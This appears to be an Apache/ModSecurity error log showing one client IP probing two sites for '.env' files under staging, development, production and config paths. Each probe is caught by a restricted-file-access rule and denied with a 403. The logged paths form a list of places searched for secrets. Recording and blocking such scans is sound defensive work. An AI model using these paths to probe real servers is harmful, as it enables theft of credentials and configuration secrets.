[Mon May 11 16:27:29.519552 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:37426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/uat/.env"] [unique_id "agHnUQ-Qm4vhlWBPlMi6nwAAABQ"]
[Mon May 11 16:27:29.519779 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:37426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/uat/.env"] [unique_id "agHnUQ-Qm4vhlWBPlMi6nwAAABQ"]
[Mon May 11 16:27:29.520329 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:37426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:29.520492 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:37426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/uat/.env"] [unique_id "agHnUQ-Qm4vhlWBPlMi6nwAAABQ"]
[Mon May 11 16:27:29.634476 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:37428] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/beta/.env"] [unique_id "agHnUVV4kyjgo4bQBUhVIgAAAMU"]
[Mon May 11 16:27:29.634695 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:37428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/beta/.env"] [unique_id "agHnUVV4kyjgo4bQBUhVIgAAAMU"]
[Mon May 11 16:27:29.635259 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:37428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:29.635419 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:37428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/beta/.env"] [unique_id "agHnUVV4kyjgo4bQBUhVIgAAAMU"]
[Mon May 11 16:27:30.239953 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:37430] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/stage/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mQAAAQU"]
[Mon May 11 16:27:30.240205 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:37430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/stage/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mQAAAQU"]
[Mon May 11 16:27:30.240728 2026] [core:error] [pid 1411055:tid 1411062] [client 18.180.54.2:37430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:30.240874 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:37430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/stage/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mQAAAQU"]
[Mon May 11 16:27:30.334460 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:37436] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uat/.env"] [unique_id "agHnUg-Qm4vhlWBPlMi6oAAAABI"]
[Mon May 11 16:27:30.334660 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:37436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uat/.env"] [unique_id "agHnUg-Qm4vhlWBPlMi6oAAAABI"]
[Mon May 11 16:27:30.335145 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:37436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:30.335301 2026] [security2:error] [pid 1411099:tid 1411118] [client 18.180.54.2:37436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uat/.env"] [unique_id "agHnUg-Qm4vhlWBPlMi6oAAAABI"]
[Mon May 11 16:27:30.954863 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:37442] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/development/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mgAAAQM"]
[Mon May 11 16:27:30.955108 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:37442] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/development/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mgAAAQM"]
[Mon May 11 16:27:30.955596 2026] [core:error] [pid 1411055:tid 1411060] [client 18.180.54.2:37442] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:30.955750 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:37442] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/development/.env"] [unique_id "agHnUkWKUxpmnkK7zHx8mgAAAQM"]
[Mon May 11 16:27:31.012505 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:37458] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/stage/.env"] [unique_id "agHnUw-Qm4vhlWBPlMi6oQAAABM"]
[Mon May 11 16:27:31.012702 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:37458] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/stage/.env"] [unique_id "agHnUw-Qm4vhlWBPlMi6oQAAABM"]
[Mon May 11 16:27:31.013187 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:37458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:31.013347 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:37458] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/stage/.env"] [unique_id "agHnUw-Qm4vhlWBPlMi6oQAAABM"]
[Mon May 11 16:27:31.700532 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:37474] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/production/.env"] [unique_id "agHnU_y_GXSWIKeli0vy3AAAAIQ"]
[Mon May 11 16:27:31.700780 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:37474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/production/.env"] [unique_id "agHnU_y_GXSWIKeli0vy3AAAAIQ"]
[Mon May 11 16:27:31.701283 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:37474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:31.701441 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:37474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/production/.env"] [unique_id "agHnU_y_GXSWIKeli0vy3AAAAIQ"]
[Mon May 11 16:27:31.702464 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:37490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/development/.env"] [unique_id "agHnU1V4kyjgo4bQBUhVJQAAAME"]
[Mon May 11 16:27:31.702636 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:37490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/development/.env"] [unique_id "agHnU1V4kyjgo4bQBUhVJQAAAME"]
[Mon May 11 16:27:31.703324 2026] [core:error] [pid 1416109:tid 1416131] [client 18.180.54.2:37490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:31.703473 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:37490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/development/.env"] [unique_id "agHnU1V4kyjgo4bQBUhVJQAAAME"]
[Mon May 11 16:27:32.382217 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:37498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/production/.env"] [unique_id "agHnVA-Qm4vhlWBPlMi6ogAAAA0"]
[Mon May 11 16:27:32.382450 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:37498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/production/.env"] [unique_id "agHnVA-Qm4vhlWBPlMi6ogAAAA0"]
[Mon May 11 16:27:32.382927 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:37498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:32.383077 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:37498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/production/.env"] [unique_id "agHnVA-Qm4vhlWBPlMi6ogAAAA0"]
[Mon May 11 16:27:32.399729 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:37512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/config/app/.env"] [unique_id "agHnVPy_GXSWIKeli0vy3QAAAIU"]
[Mon May 11 16:27:32.399940 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:37512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/config/app/.env"] [unique_id "agHnVPy_GXSWIKeli0vy3QAAAIU"]
[Mon May 11 16:27:32.400445 2026] [core:error] [pid 1411201:tid 1411251] [client 18.180.54.2:37512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:32.400597 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:37512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/config/app/.env"] [unique_id "agHnVPy_GXSWIKeli0vy3QAAAIU"]
[Mon May 11 16:27:33.074888 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:37514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/app/.env"] [unique_id "agHnVUWKUxpmnkK7zHx8ngAAARY"]
[Mon May 11 16:27:33.075116 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:37514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/app/.env"] [unique_id "agHnVUWKUxpmnkK7zHx8ngAAARY"]
[Mon May 11 16:27:33.075659 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:37514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.075830 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:37514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/config/app/.env"] [unique_id "agHnVUWKUxpmnkK7zHx8ngAAARY"]
[Mon May 11 16:27:33.081041 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:37530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.081076 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:37530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.798587 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:37560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.798625 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:37560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.800332 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:37546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:33.800362 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:37546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:34.504536 2026] [core:error] [pid 1416109:tid 1416149] [client 18.180.54.2:37582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
